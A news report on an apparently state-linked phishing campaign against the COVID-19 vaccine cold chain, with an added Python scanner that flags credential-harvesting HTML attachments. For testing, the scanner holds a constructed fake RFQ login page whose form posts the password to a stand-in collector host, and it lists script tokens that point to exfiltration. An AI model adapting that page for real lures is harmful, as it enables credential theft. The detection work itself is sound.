IBM X-Force researchers have detected an active malicious campaign: an unidentified threat group is attacking the COVID-19 vaccine supply chain. The targets are selected organizations that are involved, in one way or another, in storing and transporting vaccines.
The researchers were unable to attribute the campaign to a specific group, but the precision of the targeting carries the hallmarks of a state-sponsored operation. Let me remind you that COVID-19 vaccine developers have also been attacked.
In these attacks the operators send phishing emails to their victims in order to harvest the credentials the victims use for e-mail and other corporate applications.
“Cybercriminals have attacked a wide range of companies, sectors and government agencies, including the European Commission’s Directorate General for Taxation and Customs Union, which oversees the movement of goods across borders, including medical supplies”, say IBM X-Force researchers.
The attackers also targeted a manufacturer of solar panels used to power the refrigerated units that transport vaccines, and a petrochemical company that produces the dry ice used to keep vaccines cold in transit.
Another victim is an IT company in Germany that builds websites for pharmaceutical manufacturers, carriers, biotech companies and makers of electrical components for sea, land and air navigation and communications.
Within each company the attackers target selected senior staff rather than sending mail indiscriminately.
“These are usually people working in the sales, purchasing, IT and finance departments involved in the so-called cold supply chain – transporting vaccines at the required temperature”, report experts from IBM X-Force.
Typically, the attackers send the victim an email that purports to come from the Chinese company Haier Biomedical, an official participant in the UN Cold Chain Equipment Optimization Platform (CCEOP) program. The phishing emails are disguised as CCEOP-related requests for quotation (RFQs).
The emails carry malicious HTML attachments that the recipient is expected to download and open locally. Once opened, the file displays a login prompt, ostensibly required to view the document; the credentials entered there are sent to the attackers. Because the phishing page lives inside the attachment rather than on a web server, the attackers do not need to host a phishing site that security researchers or law enforcement could discover and take down, and the lure survives URL-based filtering in the mail gateway.
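The attachment trick described above is easy to triage once the attachment is extracted: a self-contained HTML file that asks for a password and has somewhere to send it is the signature. The script below is an added example, not IBM X-Force tooling and not an artefact from the campaign; it parses HTML attachments from a raw e-mail message and flags password fields, forms posting to a remote host, and inline scripts that could exfiltrate the form data. The sample message, attachment, and `example.invalid` hosts are constructed for illustration.

```python
"""Heuristic scan of e-mail HTML attachments for local credential-harvesting
pages (an HTML file that, when opened from disk, asks for a login and sends it
to a remote host). Added example; not IBM X-Force tooling. The sample message
and attachments below are constructed for illustration."""
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# JavaScript fragments often used to ship form data without a <form action>
SUSPICIOUS_SCRIPT_TOKENS = ("fetch(", "XMLHttpRequest", "atob(", "location.href")


class _HarvesterScanner(HTMLParser):
    """Collect form targets, password inputs and inline script text."""

    def __init__(self) -> None:
        super().__init__()
        self.form_actions: List[str] = []
        self.password_inputs = 0
        self._in_script = False
        self._script: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # boolean attributes have v=None
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands <script> bodies to handle_data
            self._script.append(data)

    @property
    def script_text(self) -> str:
        return "".join(self._script)


def scan_html(html: str) -> List[str]:
    """Return indicator strings for one HTML document (empty list = nothing flagged)."""
    p = _HarvesterScanner()
    p.feed(html)
    p.close()
    findings = []
    if p.password_inputs:
        findings.append(f"password field(s): {p.password_inputs}")
    for action in p.form_actions:
        host = urlparse(action).netloc
        if host:  # a file opened from disk has no business posting to a remote host
            findings.append(f"form posts to external host: {host}")
    for tok in SUSPICIOUS_SCRIPT_TOKENS:
        if tok in p.script_text:
            findings.append(f"inline script uses {tok}")
    return findings


def is_credential_harvester(html: str) -> bool:
    """A password prompt plus a way to exfiltrate it is the combination we flag."""
    f = scan_html(html)
    asks_for_password = any(x.startswith("password field") for x in f)
    can_exfiltrate = any(x.startswith(("form posts", "inline script")) for x in f)
    return asks_for_password and can_exfiltrate


def scan_message(raw: bytes) -> Dict[str, List[str]]:
    """Map each HTML attachment filename in a raw RFC 5322 message to its findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results: Dict[str, List[str]] = {}
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            results[part.get_filename() or "(unnamed)"] = scan_html(part.get_content())
    return results


# --- constructed samples (not real campaign artefacts) ---
PHISHING_HTML = """<html><body>
<h2>Request for Quotation - cold chain equipment</h2>
<p>Please sign in with your e-mail account to view the attached RFQ.</p>
<form action="https://collector.example.invalid/post.php" method="post">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="View document">
</form>
</body></html>"""

BENIGN_HTML = """<html><body><h2>Shipment manifest</h2>
<table><tr><td>Pallet 1</td><td>-70 C</td></tr></table></body></html>"""


def build_sample_message() -> bytes:
    """Wrap the pages as attachments, the way such a lure would arrive."""
    m = EmailMessage()
    m["From"] = "sales@supplier.example.invalid"
    m["To"] = "procurement@target.example.invalid"
    m["Subject"] = "RFQ - cold chain equipment"
    m.set_content("Please find the request for quotation attached.")
    m.add_attachment(PHISHING_HTML, subtype="html", filename="RFQ.html")
    m.add_attachment(BENIGN_HTML, subtype="html", filename="manifest.html")
    return m.as_bytes()


if __name__ == "__main__":
    for name, findings in scan_message(build_sample_message()).items():
        print(name, "->", findings or "nothing flagged")
```

Run against a mailbox export, the script gives a triage list rather than a verdict: a legitimate HTML invoice may well contain a form, so the combination of a password prompt and an exfiltration path is what earns a closer look. Attackers can also obfuscate the form inside JavaScript, which is why the scanner checks inline script bodies for network and decoding calls and not only `<form action>`.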
The victims were located not only in Germany but also in Italy, the Czech Republic and other European countries, as well as South Korea and Taiwan.
Recall also that in Brazil, the data of 16 million COVID-19 patients was exposed.